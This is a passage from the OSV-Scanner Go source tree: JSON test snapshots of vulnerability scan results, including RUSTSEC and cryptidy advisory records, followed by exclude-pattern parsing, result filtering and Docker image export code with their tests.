has been modified to always return `None` on the affected operating systems. 
This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: pkg/osvscanner/__snapshots__/osvscanner_test.snap ================================================ [TestDoScan/Test_curl_git_scanning - 1] { "results": [ { "source": { "path": "", "type": "unknown" }, "packages": [ { "package": { "name": "", 
"version": "", "ecosystem": "", "commit": "33dffa3909a67e1b5d22647128ab7eb6e53fd0c7" }, "groups": [ { "ids": [ "CVE-2025-63675" ], "aliases": [ "CVE-2025-63675", "GHSA-97w9-v595-3h5q" ], "max_severity": "8.8" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-63675.json" }, "ranges": [ { "database_specific": { "versions": [ { "introduced": "0" }, { "last_affected": "1.2.4" } ] }, "events": [ { "introduced": "0" }, { "last_affected": "33dffa3909a67e1b5d22647128ab7eb6e53fd0c7" } ], "repo": "https://github.com/netinvent/cryptidy", "type": "GIT" } ], "versions": [ "v1.0.4", "v1.0.5", "v1.0.7", "v1.1.0", "v1.2.0", "v1.2.1", "v1.2.2", "v1.2.3", "v1.2.4" ] } ], "aliases": [ "GHSA-97w9-v595-3h5q" ], "details": "cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.", "id": "CVE-2025-63675", "modified": "2026-03-14T12:45:39.021698Z", "published": "2025-10-31T07:15:38.283Z", "references": [ { "type": "WEB", "url": "https://github.com/netinvent/cryptidy/blob/cebc9ffd54cc20679d15a1a43ca9a5da645b0c58/cryptidy/symmetric_encryption.py#L220-L238" }, { "type": "EVIDENCE", "url": "https://github.com/javiermorales36/cryptidy-analysis" } ], "schema_version": "1.7.5", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ] } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: pkg/osvscanner/__snapshots__/vulnerability_result_internal_test.snap ================================================ [Test_assembleResult/group_vulnerabilities - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], 
"aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_assembleResult/group_vulnerabilities_with_all_packages_included - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" } } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] } ] }, { "source": { "path": 
"other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist_and_all_packages - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist_and_license_override - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" 
} ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "MIT" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_licenses - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } } } --- ================================================ FILE: pkg/osvscanner/exclude.go ================================================ package osvscanner import ( "fmt" "path/filepath" "regexp" "runtime" "strings" "github.com/gobwas/glob" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) // excludePatterns holds parsed patterns for excluding paths during scanning. 
// Supports three types of patterns:
//   - dirsToSkip: exact directory names to skip
//   - globPattern: glob patterns (g:pattern syntax)
//   - regexPattern: regex patterns (r:pattern syntax)
//
// Every pattern held here removes paths from a scan, so an over-broad entry
// narrows what gets checked.
type excludePatterns struct {
	dirsToSkip   []string       // Exact directory names to skip
	globPattern  glob.Glob      // Combined glob pattern using {p1,p2,...} syntax
	regexPattern *regexp.Regexp // Combined regex pattern using (p1|p2|...) syntax
}

// parseExcludePatterns parses the exclude patterns from command line.
// Pattern syntax (matching --lockfile flag style):
//   - "dirname" or ":dirname" -> exact directory name (dirsToSkip)
//   - "g:pattern" -> glob pattern (globPattern)
//   - "r:pattern" -> regex pattern (regexPattern)
//
// The ":" prefix is an escape hatch for directory names containing colons.
//
// An error is returned for any other prefix, and when the combined glob or the
// combined regex fails to compile. globPattern and regexPattern stay nil when no
// pattern of that kind was given.
func parseExcludePatterns(patterns []string) (*excludePatterns, error) {
	var dirsToSkip []string
	var globPatterns []string
	var regexPatterns []string

	// Sort every argument into one of the three buckets by its prefix.
	for _, p := range patterns {
		patternType, pattern := parseExcludeArg(p)
		switch patternType {
		case "":
			// Exact directory name
			dirsToSkip = append(dirsToSkip, pattern)
		case "g":
			globPatterns = append(globPatterns, pattern)
		case "r":
			regexPatterns = append(regexPatterns, pattern)
		default:
			return nil, fmt.Errorf("unknown pattern type %q in %q; use g: for glob or r: for regex", patternType, p)
		}
	}

	result := &excludePatterns{
		dirsToSkip: dirsToSkip,
	}

	// Compile glob patterns using {p1,p2,...} syntax
	// NOTE(review): the patterns are joined as plain text. A glob that itself contains
	// "," or braces presumably reads differently once it is wrapped with others than it
	// does alone - confirm against the glob library's escaping rules.
	if len(globPatterns) > 0 {
		var combined string
		if len(globPatterns) == 1 {
			combined = globPatterns[0]
		} else {
			combined = "{" + strings.Join(globPatterns, ",") + "}"
		}
		// '/' is passed as the separator character for the compiled glob.
		g, err := glob.Compile(combined, '/')
		if err != nil {
			return nil, fmt.Errorf("invalid glob pattern %q: %w", combined, err)
		}
		result.globPattern = g
	}

	// Compile regex patterns using (p1|p2|...) syntax
	// Only the combined expression is compiled; the individual patterns are not
	// validated on their own.
	if len(regexPatterns) > 0 {
		var combined string
		if len(regexPatterns) == 1 {
			combined = regexPatterns[0]
		} else {
			combined = "(" + strings.Join(regexPatterns, "|") + ")"
		}
		r, err := cachedregexp.Compile(combined)
		if err != nil {
			return nil, fmt.Errorf("invalid regex pattern %q: %w", combined, err)
		}
		result.regexPattern = r
	}

	return result, nil
}

// parseExcludeArg parses a single exclude argument.
// Returns (patternType, pattern) where:
//   - patternType is "" for exact match, "g" for glob, "r" for regex, or the unknown prefix
//   - pattern is the actual pattern to use
//
// Unknown prefixes are returned as-is so the caller can provide appropriate error messages.
func parseExcludeArg(arg string) (string, string) {
	// Handle Windows absolute paths (e.g., C:\path)
	// A lower-case "r:" or "g:" prefix is still read as a pattern type on Windows and
	// only produces a warning; any other absolute path is returned whole as an exact name.
	if runtime.GOOS == "windows" {
		if strings.HasPrefix(arg, "r:") || strings.HasPrefix(arg, "g:") {
			cmdlogger.Warnf("interpreting as regex/glob and not absolute path: %s", arg)
		} else if filepath.IsAbs(arg) {
			return "", arg
		}
	}

	// Split on the first colon only, so the pattern part may itself contain colons.
	patternType, pattern, found := strings.Cut(arg, ":")
	if !found {
		// No colon found, treat as exact directory name
		return "", arg
	}

	// Empty prefix means exact match (escape hatch for paths with colons)
	// "g" prefix means glob pattern
	// "r" prefix means regex pattern
	// Return all prefixes (including unknown ones) to let the caller handle validation
	return patternType, pattern
}

================================================
FILE: pkg/osvscanner/exclude_test.go
================================================
package osvscanner

import (
	"testing"
)

// Test_parseExcludeArg checks how a single exclude argument is split into a
// pattern type and a pattern.
func Test_parseExcludeArg(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name            string
		arg             string
		wantPatternType string
		wantPattern     string
	}{
		{"exact_directory_name", "test", "", "test"},
		{"exact_with_colon_escape", ":test", "", "test"},
		{"glob_pattern", "g:**/test/**", "g", "**/test/**"},
		{"regex_pattern", "r:\\.git", "r", "\\.git"},
		{"regex_with_pipe", "r:node_modules|vendor", "r", "node_modules|vendor"},
		{"empty_string", "", "", ""},
		{"directory_with_colon_escape", ":my:project", "", "my:project"},
		{"single_letter_dir", "g", "", "g"},
		{"path_like_glob", "test/path", "", "test/path"},
		{"unknown_prefix_returns_prefix", "x:pattern", "x", "pattern"},
		// Windows specific tests - these will run on Linux too but result might depend on OS
		// We expect r: to be regex on ALL platforms now with the fix (since it falls through on Linux, and matches explicit check on Windows)
		{"windows_regex_lower_r", `r:pattern`, "r", "pattern"},
		{"windows_glob_lower_g", `g:pattern`, "g", "pattern"},
		{"windows_regex_simple", `r:foo`, "r", "foo"},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			patternType, pattern := parseExcludeArg(tt.arg)
			if patternType != tt.wantPatternType {
				t.Errorf("parseExcludeArg(%q) patternType = %q, want %q", tt.arg, patternType, tt.wantPatternType)
			}
			if pattern != tt.wantPattern {
				t.Errorf("parseExcludeArg(%q) pattern = %q, want %q", tt.arg, pattern, tt.wantPattern)
			}
		})
	}
}

// Test_parseExcludePatterns checks the error result, the number of exact
// directory names, and that a compiled glob or regex matches one sample path.
func Test_parseExcludePatterns(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name          string
		patterns      []string
		wantErr       bool
		dirsCount     int
		globTestPath  string // when non-empty, a glob must be present and match this path
		regexTestPath string // when non-empty, a regex must be present and match this path
	}{
		{
			name:      "single_exact_directory",
			patterns:  []string{"test"},
			dirsCount: 1,
		},
		{
			name:      "multiple_exact_directories",
			patterns:  []string{"test", "docs", "vendor"},
			dirsCount: 3,
		},
		{
			name:         "single_glob_pattern",
			patterns:     []string{"g:**/test/**"},
			globTestPath: "foo/test/bar",
		},
		{
			name:          "single_regex_pattern",
			patterns:      []string{"r:\\.git"},
			regexTestPath: ".git",
		},
		{
			name:          "mixed_patterns",
			patterns:      []string{"vendor", "g:**/test/**", "r:node_modules"},
			dirsCount:     1,
			globTestPath:  "foo/test/bar",
			regexTestPath: "node_modules",
		},
		{
			name:         "multiple_glob_patterns",
			patterns:     []string{"g:**/test/**", "g:**/docs/**"},
			globTestPath: "foo/docs/readme",
		},
		{
			name:          "multiple_regex_patterns",
			patterns:      []string{"r:\\.git", "r:\\.cache"},
			regexTestPath: ".cache",
		},
		{
			name:     "empty_patterns",
			patterns: []string{},
		},
		{
			name:     "invalid_glob",
			patterns: []string{"g:["},
			wantErr:  true,
		},
		{
			name:     "invalid_regex",
			patterns: []string{"r:[invalid"},
			wantErr:  true,
		},
		{
			name:      "colon_escape_for_exact_match",
			patterns:  []string{":my:project"},
			dirsCount: 1,
		},
		{
			name:     "unknown_prefix_returns_error",
			patterns: []string{"x:pattern"},
			wantErr:  true,
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			result, err := parseExcludePatterns(tt.patterns)
			if (err != nil) != tt.wantErr {
				t.Errorf("parseExcludePatterns() error = %v, wantErr %v", err, tt.wantErr)
				return
			}
			if tt.wantErr {
				return
			}

			// Check dirs count
			if len(result.dirsToSkip) != tt.dirsCount {
				t.Errorf("parseExcludePatterns() dirsToSkip count = %d, want %d", len(result.dirsToSkip), tt.dirsCount)
			}

			// Check glob pattern presence and matching
			wantGlob := tt.globTestPath != ""
			if (result.globPattern != nil) != wantGlob {
				t.Errorf("parseExcludePatterns() globPattern present = %v, want %v", result.globPattern != nil, wantGlob)
			}
			if wantGlob && result.globPattern != nil {
				if !result.globPattern.Match(tt.globTestPath) {
					t.Errorf("globPattern.Match(%q) = false, want true", tt.globTestPath)
				}
			}

			// Check regex pattern presence and matching
			wantRegex := tt.regexTestPath != ""
			if (result.regexPattern != nil) != wantRegex {
				t.Errorf("parseExcludePatterns() regexPattern present = %v, want %v", result.regexPattern != nil, wantRegex)
			}
			if wantRegex && result.regexPattern != nil {
				if !result.regexPattern.MatchString(tt.regexTestPath) {
					t.Errorf("regexPattern.MatchString(%q) = false, want true", tt.regexTestPath)
				}
			}
		})
	}
}

================================================
FILE: pkg/osvscanner/filter.go
================================================
// Package osvscanner provides the main logic for the OSV-Scanner.
package osvscanner

import (
	"fmt"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/config"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/google/osv-scanner/v2/internal/imodels/results"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// filterUnscannablePackages drops packages that lack the information needed for a
// scan or that belong to an unsupported ecosystem (e.g. local packages specified
// by path). scanResults.PackageScanResults is replaced with the packages that
// remain. The dropped packages are returned only when actions.ShowAllPackages is
// set; otherwise the returned slice is empty.
func filterUnscannablePackages(scanResults *results.ScanResults, actions ScannerActions) []*extractor.Package {
	total := len(scanResults.PackageScanResults)
	kept := make([]*extractor.Package, 0, total)
	dropped := make([]*extractor.Package, 0, total)

	for _, psr := range scanResults.PackageScanResults {
		// A package is scannable with either a full ecosystem/name/version triple
		// or a commit.
		scannable := (!imodels.Ecosystem(psr).IsEmpty() && imodels.Name(psr) != "" && imodels.Version(psr) != "") ||
			imodels.Commit(psr) != ""

		// Skipped even when scannable: a Maven package named "unknown", and a
		// non-empty ecosystem that is reported as invalid.
		skip := !scannable ||
			(imodels.Ecosystem(psr).Ecosystem == osvconstants.EcosystemMaven && imodels.Name(psr) == "unknown") ||
			(imodels.Ecosystem(psr).GetValidity() != nil && !imodels.Ecosystem(psr).IsEmpty())

		if skip {
			if actions.ShowAllPackages {
				dropped = append(dropped, psr)
			}

			continue
		}

		kept = append(kept, psr)
	}

	if removed := total - len(kept); removed != 0 {
		cmdlogger.Infof("Filtered %d local/unscannable package/s from the scan.", removed)
	}

	scanResults.PackageScanResults = kept

	return dropped
}

// filterNonContainerRelevantPackages drops packages that do not matter for a
// container scan, updating scanResults.PackageScanResults in place.
func filterNonContainerRelevantPackages(scanResults *results.ScanResults) {
	before := len(scanResults.PackageScanResults)
	relevant := make([]*extractor.Package, 0, before)

	for _, psr := range scanResults.PackageScanResults {
		// Nearly every package whose SourceName is linux is a kernel package.
		// Those do not apply inside a container, which runs on the host's kernel.
		if imodels.Name(psr) != "linux" {
			relevant = append(relevant, psr)
		}
	}

	if len(relevant) != before {
		cmdlogger.Infof("Filtered %d non container relevant package/s from the scan.", before-len(relevant))
	}

	scanResults.PackageScanResults = relevant
}

// filterIgnoredPackages drops the packages that the applicable config says to
// ignore, updating scanResults.PackageScanResults in place. Each dropped package
// is logged together with the reason recorded in the config.
func filterIgnoredPackages(scanResults *results.ScanResults) {
	manager := &scanResults.ConfigManager
	kept := make([]*extractor.Package, 0, len(scanResults.PackageScanResults))

	for _, psr := range scanResults.PackageScanResults {
		// The config is looked up per package, by the package's location.
		configToUse := manager.Get(imodels.Location(psr))

		ignore, entry := configToUse.ShouldIgnorePackage(psr)
		if !ignore {
			kept = append(kept, psr)

			continue
		}

		label := fmt.Sprintf("%s/%s/%s", imodels.Ecosystem(psr).String(), imodels.Name(psr), imodels.Version(psr))
		why := entry.Reason
		if why == "" {
			why = "(no reason given)"
		}
		cmdlogger.Infof("Package %s has been filtered out because: %s", label, why)
	}

	if len(kept) != len(scanResults.PackageScanResults) {
		cmdlogger.Infof("Filtered %d ignored package/s from the scan.", len(scanResults.PackageScanResults)-len(kept))
	}

	scanResults.PackageScanResults = kept
}

// Filters results according to config, preserving order. Returns total number of vulnerabilities removed.
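func filterResults(vulnResults *models.VulnerabilityResults, configManager *config.Manager, allPackages bool) int {
	// vulnResults.Results is rewritten in place. The config applied to each package
	// source is the one configManager returns for that source's path.
	removedCount := 0
	newResults := []models.PackageSource{} // Want 0 vulnerabilities to show in JSON as an empty list, not null.
	for _, pkgSrc := range vulnResults.Results {
		configToUse := configManager.Get(pkgSrc.Source.Path)
		var newPackages []models.PackageVulns
		for _, pkgVulns := range pkgSrc.Packages {
			newVulns := filterPackageVulns(pkgVulns, configToUse)
			removedCount += len(pkgVulns.Vulnerabilities) - len(newVulns.Vulnerabilities)
			// A package stays in the output when it still has vulnerabilities, has
			// license violations, is deprecated, or all packages were requested.
			if allPackages || len(newVulns.Vulnerabilities) > 0 || len(pkgVulns.LicenseViolations) > 0 || pkgVulns.Package.Deprecated {
				newPackages = append(newPackages, newVulns)
			}
		}
		// Don't want to include the package source at all if there are no vulns.
		if len(newPackages) > 0 {
			pkgSrc.Packages = newPackages
			newResults = append(newResults, pkgSrc)
		}
	}
	vulnResults.Results = newResults

	return removedCount
}

// filterPackageVulns filters package-grouped vulnerabilities according to config,
// preserving ordering. Returns filtered package vulnerabilities.
//
// Ignoring one ID suppresses its whole group: when any alias in a group matches an
// ignore entry, the group and every vulnerability whose ID is among that group's
// aliases are removed.
func filterPackageVulns(pkgVulns models.PackageVulns, configToUse config.Config) models.PackageVulns {
	ignoredVulns := map[string]struct{}{}

	// Iterate over groups first to remove all aliases of ignored vulnerabilities.
	var newGroups []models.GroupInfo
	for _, group := range pkgVulns.Groups {
		ignore := false
		for _, id := range group.Aliases {
			var ignoreLine *config.IgnoreEntry
			// Plain assignment (not :=) so the outer ignore flag is the one that is set.
			if ignore, ignoreLine = configToUse.ShouldIgnore(id); ignore {
				for _, id := range group.Aliases {
					ignoredVulns[id] = struct{}{}
				}

				reason := ignoreLine.Reason
				if reason == "" {
					reason = "(no reason given)"
				}

				// NB: This only prints the first reason encountered in all the aliases.
				switch len(group.Aliases) {
				case 1:
					cmdlogger.Infof("%s has been filtered out because: %s", ignoreLine.ID, reason)
				case 2:
					cmdlogger.Infof("%s and 1 alias have been filtered out because: %s", ignoreLine.ID, reason)
				default:
					cmdlogger.Infof("%s and %d aliases have been filtered out because: %s", ignoreLine.ID, len(group.Aliases)-1, reason)
				}

				ignoreLine.MarkAsUsed()

				// The first matching alias decides the group; stop checking the rest.
				break
			}
		}
		if !ignore {
			newGroups = append(newGroups, group)
		}
	}

	var newVulns []*osvschema.Vulnerability
	if len(newGroups) > 0 { // If there are no groups left then there would be no vulnerabilities.
		for _, vuln := range pkgVulns.Vulnerabilities {
			if _, filtered := ignoredVulns[vuln.GetId()]; !filtered {
				newVulns = append(newVulns, vuln)
			}
		}
	}

	// Passed by value. We don't want to alter the original PackageVulns.
	pkgVulns.Groups = newGroups
	pkgVulns.Vulnerabilities = newVulns

	return pkgVulns
}

================================================
FILE: pkg/osvscanner/filter_internal_test.go
================================================
package osvscanner

import (
	"path/filepath"
	"testing"

	"github.com/google/osv-scanner/v2/internal/config"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// Test_filterResults runs filterResults over JSON fixtures, snapshots the filtered
// results and checks the number of vulnerabilities reported as removed.
func Test_filterResults(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		path string
		want int
	}{
		{
			name: "filter_everything",
			path: "testdata/filter/all",
			want: 15,
		},
		{
			name: "filter_nothing",
			path: "testdata/filter/none",
			want: 0,
		},
		{
			name: "filter_partially",
			path: "testdata/filter/some",
			want: 10,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			// configManager looks for osv-scanner.toml in the source path.
			// Sources in the test input should point to files/folders in the testdata folder for this to work correctly.
			configManager := config.Manager{
				DefaultConfig: config.Config{},
				ConfigMap:     make(map[string]config.Config),
			}

			got := testutility.LoadJSONFixture[models.VulnerabilityResults](t, filepath.Join(tt.path, "input.json"))
			filtered := filterResults(&got, &configManager, false)

			testutility.NewSnapshot().MatchJSON(t, got)

			if filtered != tt.want {
				t.Errorf("filterResults() = %v, want %v", filtered, tt.want)
			}
		})
	}
}

================================================
FILE: pkg/osvscanner/internal/imagehelpers/imagehelpers.go
================================================
// Package imagehelpers provides helper functions for working with container images.
package imagehelpers

import (
	"bufio"
	"context"
	"errors"
	"fmt"
	"os"
	"os/exec"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/imodels/results"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/opencontainers/go-digest"
)

// BuildImageMetadata converts the image metadata held in scanResults into a
// models.ImageMetadata: one LayerMetadata per layer, one slice of base image
// details per base image chain, and the OS taken from the "PRETTY_NAME" entry of
// the OS info. It returns nil when scanResults carries no image metadata.
func BuildImageMetadata(scanResults *results.ScanResults) *models.ImageMetadata {
	if scanResults.ImageMetadata == nil {
		return nil
	}

	layerMetadata := make([]models.LayerMetadata, 0, len(scanResults.ImageMetadata.GetLayerMetadata()))
	for _, cl := range scanResults.ImageMetadata.GetLayerMetadata() {
		layerMetadata = append(layerMetadata, models.LayerMetadata{
			DiffID:         digest.Digest(cl.GetDiffId()),
			Command:        cl.GetCommand(),
			IsEmpty:        cl.GetIsEmpty(),
			BaseImageIndex: int(cl.GetBaseImageIndex()),
		})
	}

	baseImages := make([][]models.BaseImageDetails, 0, len(scanResults.ImageMetadata.GetBaseImageChains()))
	for _, chain := range scanResults.ImageMetadata.GetBaseImageChains() {
		baseImageChain := make([]models.BaseImageDetails, 0, len(chain.GetBaseImages()))
		for _, imgs := range chain.GetBaseImages() {
			// Only the repository name is carried over for each base image.
			baseImageChain = append(baseImageChain, models.BaseImageDetails{
				Name: imgs.GetRepository(),
			})
		}
		baseImages = append(baseImages, baseImageChain)
	}

	imgMetadata := models.ImageMetadata{
		OS:            scanResults.ImageMetadata.GetOsInfo()["PRETTY_NAME"],
		LayerMetadata: layerMetadata,
		BaseImages:    baseImages,
	}

	return &imgMetadata
}

// ExportDockerImage will execute the docker binary to export an image to a temporary file in the tarball OCI format.
//
// If ExportDockerImage does not error, the temporary file needs to be cleaned up by the caller, otherwise, it will be
// cleaned automatically by this function.
//
// ExportDockerImage will first try to locate the image locally, and if not found, attempt to pull the image from the docker registry.
//
// An image name that starts with "-" is rejected with an error before any file is
// created or any command is run.
func ExportDockerImage(ctx context.Context, dockerImageName string) (string, error) {
	// The name is handed to the docker CLI as a positional argument below. A value
	// starting with "-" would be parsed by docker as an option rather than as an
	// image reference, so refuse it up front.
	if len(dockerImageName) > 0 && dockerImageName[0] == '-' {
		return "", fmt.Errorf("invalid docker image name %q: must not start with \"-\"", dockerImageName)
	}

	tempImageFile, err := os.CreateTemp("", "docker-image-*.tar")
	if err != nil {
		cmdlogger.Errorf("Failed to create temporary file: %s", err)
		return "", err
	}

	// Only the path is needed; docker writes to the file itself.
	err = tempImageFile.Close()
	if err != nil {
		_ = os.RemoveAll(tempImageFile.Name())
		return "", err
	}

	// Check if image exists locally, if not, pull from the cloud.
	cmdlogger.Infof("Checking if docker image (%q) exists locally...", dockerImageName)
	cmd := exec.CommandContext(ctx, "docker", "images", "-q", dockerImageName)
	output, err := cmd.Output()
	// A failed lookup is treated the same as "not found": both lead to a pull.
	if err != nil || string(output) == "" {
		cmdlogger.Infof("Image not found locally, pulling docker image (%q)...", dockerImageName)
		err = runCommandLogError(ctx, "docker", "pull", "-q", dockerImageName)
		if err != nil {
			_ = os.RemoveAll(tempImageFile.Name())
			return "", fmt.Errorf("failed to pull container image: %w", err)
		}
	}

	cmdlogger.Infof("Saving docker image (%q) to temporary file...", dockerImageName)
	err = runCommandLogError(ctx, "docker", "save", "-o", tempImageFile.Name(), dockerImageName)
	if err != nil {
		_ = os.RemoveAll(tempImageFile.Name())
		return "", err
	}

	return tempImageFile.Name(), nil
}

// runCommandLogError runs the given command and waits for it to finish. When the
// command fails, its exit code and captured stderr lines are logged and a generic
// error is returned; the error from Wait is not wrapped into it.
func runCommandLogError(ctx context.Context, name string, args ...string) error {
	cmd := exec.CommandContext(ctx, name, args...)

	// Get stderr for debugging when docker fails
	stderr, err := cmd.StderrPipe()
	if err != nil {
		cmdlogger.Errorf("Failed to get stderr: %s", err)
		return err
	}

	err = cmd.Start()
	if err != nil {
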